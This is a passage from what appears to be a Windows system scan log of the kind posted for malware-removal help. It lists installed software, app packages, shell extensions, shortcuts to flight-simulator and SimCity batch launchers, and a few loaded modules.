SimCity 4 Deluxe Edition (HKLM-x32\...\GOGPACKSC4_is1) (Version: 2.0.0.8 - GOG.com)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
SumatraPDF (HKLM\...\SumatraPDF) (Version: 3.1.2 - Krzysztof Kowalczyk)
TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.2.36215 - TeamViewer)
teVirtualMIDI64 (HKLM\...\{9084640A-366B-4C44-BDB1-74864B460B13}) (Version: 1.2.10.38 - Tobias Erichsen) Hidden
thinkorswim (HKLM\...\9968-4488-2169-7623) (Version: desktop - thinkorswim, Inc)
Traffic Simulator Configuration Tool (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Traffic Simulator Configuration Tool) (Version:  - )
TypeScript SDK (HKLM-x32\...\{3CBDDAE8-99AE-4168-BDA7-8352BF15BE73}) (Version: 3.1.2.0 - Microsoft Corporation) Hidden
TypeScript SDK (HKLM-x32\...\{CFA1F87E-EF2B-4785-812C-4BEEA22CFD06}) (Version: 2.3.5.0 - Microsoft Corporation) Hidden
UltraSearch V2.3 (64 bit) (HKLM\...\UltraSearch_is1) (Version: 2.3 - JAM Software)
Unity (HKLM-x32\...\Unity) (Version: 5.6.3p1 - Unity Technologies ApS)
Universal CRT Extension SDK (HKLM-x32\...\{1FBCBC17-4527-2340-0832-B1D49C41FF67}) (Version: 10.0.26624 - Microsoft Corporation) Hidden
Universal CRT Extension SDK (HKLM-x32\...\{7D225043-6CC5-7B56-11DD-AFF90E4C1C0C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Extension SDK (HKLM-x32\...\{BE2D1829-B45D-4D78-BF02-4076B86AC57C}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{8BFBEC30-33CC-13B4-849F-3B036F27466A}) (Version: 10.0.26624 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{A46D1F7A-BA32-2375-EF97-4975E594A7E7}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Headers Libraries and Sources (HKLM-x32\...\{CB19DBA2-C210-5646-9522-695A1317CD34}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{413A1F9C-9349-4847-610E-BAB177A48ADE}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal CRT Redistributable (HKLM-x32\...\{5F577A45-3C65-352B-061D-D6A57F05402C}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Tools x64 (HKLM\...\{3B588BBE-EB02-D1B2-5CD5-7DB85AD8A3E7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal CRT Tools x86 (HKLM-x32\...\{D2DC1EDF-EE04-9B5F-BDD7-06645D859EC3}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{CE83D0BD-418A-F3D1-D6CE-687E96D1EBD0}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
Universal General MIDI DLS Extension SDK (HKLM-x32\...\{E2EA2702-534B-D6C1-5AC4-724E3CE7B2D9}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
Universal Patch Finder version 1.5 (HKLM-x32\...\{88FBB3D2-C9A5-41E4-88B8-3F4F1722E7D1}_is1) (Version: 1.5 - Hypercube Softwares)
Update for  (KB2504637) (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}.KB2504637) (Version: 1 - Microsoft Corporation)
Update for Windows 10 for x64-based Systems (KB4023057) (HKLM\...\{9C4F3AF4-21D8-43BD-A69C-517BB96012CF}) (Version: 2.12.0.0 - Microsoft Corporation)
UpdateAssistant (HKLM-x32\...\{B302EECB-0DA5-46E6-8A58-127440F22CF1}) (Version: 1.7.0.0 - Microsoft Corporation) Hidden
VBSBeautifier (remove only) (HKLM-x32\...\VBSBeautifier) (Version:  - )
vcpp_crt.redist.clickonce (HKLM-x32\...\{253D6AD3-5786-4B3B-B4E1-E082482A1F26}) (Version: 14.16.27033 - Microsoft Corporation) Hidden
VeraCrypt (HKLM-x32\...\VeraCrypt) (Version: 1.21 - IDRIX)
Viber (HKLM-x32\...\{32AF88A9-E104-4306-8B68-CB92FFD2CAD6}) (Version: 11.0.0.42 - Viber Media S.a.r.l) Hidden
Viber (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\{9097b5b3-1f2b-4ff7-a350-97a76bb76fb8}) (Version: 11.0.0.42 - Viber Media S.a.r.l)
Visual Studio Community 2017 (HKLM-x32\...\fba7c5bd) (Version: 15.9.28307.905 - Microsoft Corporation)
VLC media player (HKLM-x32\...\VLC media player) (Version: 3.0.8 - VideoLAN)
VoiceBot 3.0 (HKLM-x32\...\2BB5202A-885B-454F-8624-FD3310CD3225_is1) (Version: 3.0.0.0 - Binary Fortress Software)
VS Immersive Activate Helper (HKLM-x32\...\{54FBC9A9-CCA1-417E-ACA6-203A32A39F37}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
VS JIT Debugger (HKLM\...\{4B816AD0-D12B-498A-8148-7CBE3ED328DE}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
VS Script Debugging Common (HKLM\...\{8B657335-3813-4CF4-A6FE-2AA44BE23F94}) (Version: 16.0.95.0 - Microsoft Corporation) Hidden
vs_BlendMsi (HKLM-x32\...\{C5D83E0F-12E7-4BA3-98E6-DAE0E73B5BF9}) (Version: 15.0.27205 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsi (HKLM-x32\...\{A68D7884-F036-4A0D-AE1A-410E0311E135}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_clickoncebootstrappermsires (HKLM-x32\...\{91DDDFB5-1782-48C2-BA2A-8F4D9DE39D27}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_clickoncesigntoolmsi (HKLM-x32\...\{6A1ECF65-2CBF-4B33-9D4A-D1C0A0E5FE45}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_communitymsi (HKLM-x32\...\{71797C29-380A-492C-B35A-F5E4A7B57BDC}) (Version: 15.9.28307 - Microsoft Corporation) Hidden
vs_communitymsires (HKLM-x32\...\{40040E64-50EB-4FCF-B209-DA0B20821759}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_devenvmsi (HKLM-x32\...\{BFFA2FFB-1095-4ADD-A352-368806D2412B}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_filehandler_amd64 (HKLM-x32\...\{A254DA0E-26A1-43C3-95BE-7A24D5599473}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_filehandler_x86 (HKLM-x32\...\{1F42A73E-CF26-4D67-BA79-752CA56B639F}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_FileTracker_Singleton (HKLM-x32\...\{A41E138F-5A3F-443C-B72D-957AB994FB5A}) (Version: 15.9.28128 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx64 (HKLM\...\{B6BAC9A6-A70D-4E4D-B90A-7EE2B336E090}) (Version: 15.8.27729 - Microsoft Corporation) Hidden
vs_Graphics_Singletonx86 (HKLM-x32\...\{3161DA68-DD37-4798-82DB-B3A0BD6BA233}) (Version: 15.8.27729 - Microsoft Corporation) Hidden
vs_minshellinteropmsi (HKLM-x32\...\{3A78DA3D-C8D4-429D-B536-6E59A0088451}) (Version: 15.8.27825 - Microsoft Corporation) Hidden
vs_minshellmsi (HKLM-x32\...\{68B8AD33-CE97-4C3D-9583-669C39D21BA5}) (Version: 15.9.28302 - Microsoft Corporation) Hidden
vs_minshellmsires (HKLM-x32\...\{6DFE6F8D-B61D-4348-AB70-4ABF1210DFD5}) (Version: 15.0.26621 - Microsoft Corporation) Hidden
vs_SQLClickOnceBootstrappermsi (HKLM-x32\...\{5779B6DD-604A-41CE-BC3D-9D4BDDA22AD2}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
vs_tipsmsi (HKLM-x32\...\{1AC6CC3D-7724-4D84-9270-798A2191AB1C}) (Version: 15.0.27005 - Microsoft Corporation) Hidden
Weka 3.8.3 (HKLM\...\Weka 3.8.3) (Version: 3.8.3 - Machine Learning Group, University of Waikato, Hamilton, NZ)
WinAppDeploy (HKLM-x32\...\{03343DEA-224B-E9B6-1FBB-E637E6BC6BAA}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinAppDeploy (HKLM-x32\...\{716AE8F2-1BE3-7657-DF6B-F23DEEC75AF9}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinAutomation (HKLM\...\{67F5E390-8E09-4AE4-B7F2-705AFD23D86D}) (Version: 6.0.2.4227 - Softomotive Ltd) Hidden
WinAutomation (HKLM-x32\...\WinAutomation) (Version: 6.0.2.4227 - Softomotive Ltd)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22211 - Microsoft Corporation)
Windows SDK AddOn (HKLM-x32\...\{E1C6F438-7C50-41F5-8B47-3CC96D397CA3}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows Setup Remediations (x64) (KB4023057) (HKLM\...\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb) (Version:  - )
Windows Software Development Kit - Windows 10.0.15063.674 (HKLM-x32\...\{6824cee4-b358-4633-b82c-5f20894af8e2}) (Version: 10.1.15063.674 - Microsoft Corporation)
Windows Software Development Kit - Windows 10.0.17763.132 (HKLM-x32\...\{5fe95b9d-9219-4d8b-a031-71323ae48a81}) (Version: 10.1.17763.132 - Microsoft Corporation)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{00B12DF9-5428-9406-DE2C-8E8A1A062B05}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - en-us (HKLM-x32\...\{D8AA52A2-81E2-BB84-AAF9-C487C586CC15}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{5715A2A6-E637-81E3-464D-3F0F999E506A}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense Desktop - Other Languages (HKLM-x32\...\{E82A4A6C-C21C-35FE-B805-3E44318F6D63}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{2B8614A6-D0C1-CFE0-9311-7AF9227DC9BA}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - en-us (HKLM-x32\...\{7E898893-9C42-A572-7F57-FDE55CE812F7}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{409D68FF-37DD-F8F4-A60F-30BEAA4AA4CE}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense IoT - Other Languages (HKLM-x32\...\{E8B1CB29-5C24-D882-3CEF-F8A7263BC63D}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense Mobile - en-us (HKLM-x32\...\{F6F11150-93DE-0507-FCA0-F746E0207017}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{3617F573-CF51-0F5A-063F-B272F98D0522}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - en-us (HKLM-x32\...\{8329C3A0-8582-D1C2-67FF-800654BFDF45}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{771C9DEF-7C0B-85DA-6426-7A20F06BEC94}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense PPI - Other Languages (HKLM-x32\...\{FDE59EF8-D43D-F9DA-5B0C-CC9C90DB0335}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{87CC4887-0873-F87B-D804-6A78B07DC1F5}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - en-us (HKLM-x32\...\{B047C746-63E8-41C7-A5C0-7ABD390CF3E6}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{0063AF94-397B-9C64-1C71-D404B27C5D96}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
WinRT Intellisense UAP - Other Languages (HKLM-x32\...\{D62E0DD5-9853-C09C-AE15-D02988503C60}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
wxWidgets 3.0.4 (HKLM-x32\...\wxWidgets_is1) (Version:  - wxWidgets)
X-Mouse Button Control 2.18.8 (HKLM-x32\...\X-Mouse Button Control) (Version: 2.18.8 - Highresolution Enterprises)
ZBrush 4R7 (HKLM-x32\...\ZBrush 4R7 4R7) (Version: 4R7 - Pixologic)

Packages:
=========
Mail and Calendar -> C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.12228.20206.0_x64__8wekyb3d8bbwe [2019-11-20] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x64__8wekyb3d8bbwe [2019-01-19] (Microsoft Corporation) [MS Ad]
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-01-19] (Microsoft Corporation) [MS Ad]
Microsoft News -> C:\Program Files\WindowsApps\Microsoft.BingNews_4.33.13094.0_x64__8wekyb3d8bbwe [2019-11-13] (Microsoft Corporation) [MS Ad]
Microsoft Phone Companion -> C:\Program Files\WindowsApps\Microsoft.WindowsPhone_10.1802.311.0_x64__8wekyb3d8bbwe [2018-11-13] (Microsoft Corporation)
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.11052.0_x64__8wekyb3d8bbwe [2019-11-10] (Microsoft Studios) [MS Ad]
MSN Money -> C:\Program Files\WindowsApps\Microsoft.BingFinance_4.31.11905.0_x64__8wekyb3d8bbwe [2019-07-19] (Microsoft Corporation) [MS Ad]
MSN Sports -> C:\Program Files\WindowsApps\Microsoft.BingSports_4.31.11905.0_x64__8wekyb3d8bbwe [2019-07-19] (Microsoft Corporation) [MS Ad]
MSN Weather -> C:\Program Files\WindowsApps\Microsoft.BingWeather_4.33.13253.0_x64__8wekyb3d8bbwe [2019-11-23] (Microsoft Corporation) [MS Ad]
Photos Media Engine Add-on -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2019-11-13] (Microsoft Corporation)

==================== Custom CLSID (Whitelisted): ==============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-3967059023-4107875624-2872843465-1001_Classes\CLSID\{23066764-9BDD-4FBD-8B1F-F4547CF2684F}\InprocServer32 -> C:\Users\SR\AppData\Local\Microsoft\OneDrive\18.070.0405.0002\amd64\FileSyncShell64.dll => No File
CustomCLSID: HKU\S-1-5-21-3967059023-4107875624-2872843465-1001_Classes\CLSID\{E31EA727-12ED-4702-820C-4B6445F28E1A} -> [Dropbox] => C:\Users\SR\Dropbox [2018-01-03 12:23]
ShellIconOverlayIdentifiers: [   DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [   DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ShellIconOverlayIdentifiers-x32: [   DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ContextMenuHandlers1: [AESCrypt] -> {35872D53-3BD4-45FA-8DB5-FFC47D4235E7} => C:\Program Files\AESCrypt\AESCrypt.dll [2015-04-17] (Packetizer, Inc.) [File not signed]
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2018-07-23] (Notepad++ -> )
ContextMenuHandlers1: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers1: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => C:\Program Files\PDFCreator\PDFCreatorShell.DLL [2017-01-31] (pdfforge GmbH -> pdfforge GmbH)
ContextMenuHandlers1: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers2: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers4: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-08-26] (Florian Heidenreich) [File not signed]
ContextMenuHandlers4: [PureSync] -> {D1079645-619B-4d0b-8FD5-1008B95134E1} => C:\Program Files (x86)\Jumping Bytes\PureSync\shellext\psshell64.dll [2016-03-03] (Jumping Bytes  (Christoph Guentner) -> Jumping Bytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} =>  -> No File
ContextMenuHandlers5: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Program Files (x86)\Dropbox\Client\DropboxExt64.27.0.dll [2019-05-07] (Dropbox, Inc -> Dropbox, Inc.)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] (Adobe Systems Incorporated -> )
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2019-06-26] (Malwarebytes Corporation -> Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-14] (win.rar GmbH -> Alexander Roshal)

==================== Codecs (Whitelisted) ====================

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\SR\Desktop\Traffic Simulator Configuration Tool.lnk -> C:\Program Files (x86)\Traffic Simulator Configuration Tool\TSCT.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maxis\SimCity 4\Traffic Simulator Configuration Tool.lnk -> C:\Program Files (x86)\Traffic Simulator Configuration Tool\TSCT.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_AlpesNordBP.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_AlpesNordBP.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_SUMMER.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_SUMMER.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH4 Megève\LLH_WINTER.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\LLH_WINTER.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_Summer.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_Summer.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_SummerBasePack.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_SummerBasePack.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH8X\LLH8X_Winter.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH8X\Scenery\LLH8X_Winter.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_Summer.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_Summer.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_SummerBasePack.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_SummerBasePack.bat ()
Shortcut: C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\LLH\LLH7X\LLH7X_Winter.lnk -> D:\Dovetail Games - Flight\Microsoft Flight Simulator X Steam Edition\Addon Scenery\LLH7X\Scenery\LLH7X_Winter.bat ()

==================== Loaded Modules (Whitelisted) =============

2009-02-23 12:28 - 2009-02-23 12:28 - 000013824 _____ (Creative Technology Ltd) [File not signed] C:\Windows\System32\ctagent.DLL
2009-02-23 12:27 - 2009-02-23 12:27 - 000175104 _____ (Creative Technology Ltd) [File not signed] C:\WINDOWS\System32\CTDCIFCE.DLL
